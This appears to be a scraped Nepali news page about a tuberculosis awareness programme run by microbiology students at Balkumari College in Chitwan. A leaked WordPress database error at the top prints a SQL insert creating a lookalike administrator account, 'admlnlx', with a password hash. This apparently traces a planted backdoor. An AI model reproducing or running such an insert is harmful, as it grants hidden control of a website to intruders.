WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bhg5J5Rx.zTPhDokp.h7Z6pwMi9Tzx0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-01 12:23:45', '', 'admlnlx', 'admlnlx')
चितवन,पुस १३-
बालकुमारी कलेजका माइक्रोबायोलोजी विभागका विध्यार्थीको आयोजनामा आज(बुधबार) क्याम्पस हल भित्रै क्षयरोग सम्बन्धी चेतनामुलक कायृक्रम सम्पन्न भएको छ ।
कार्यक्रममा टिबी रोगको संक्रमण र त्यसबारे विभिन्न चेतनामुलक सामाग्रीहरु प्स्तुत गएिको थियो । क्षयरोगको कारक तत्व र त्यसको निधानको बारेमा माइक्रो बायोलोजि विभाग बालकुमारी कलेजका कार्यक्रम प्रमुख अनुप बज्राचार्यले प्रस्ट पार्नुभएको थियो । त्यसैगरी डा.अजय पौडेले क्षयरोग विषय अन्तर्गत आफनो सोधपत्र प्रस्तुत गर्नुभयो साथै माइक्रोबायोलोजि सहप्राध्यापक अनिल श्रेष्ठले एन्टिवायोटिकको दुरुपयोग र त्यसको सम्मावित खतराको बारेमा जानकारी दिए । कार्यक्रमा शीव प्रसाद पौडेल, पबित्रा श्रेष्ठ लगायतको उपस्थीति थियो ।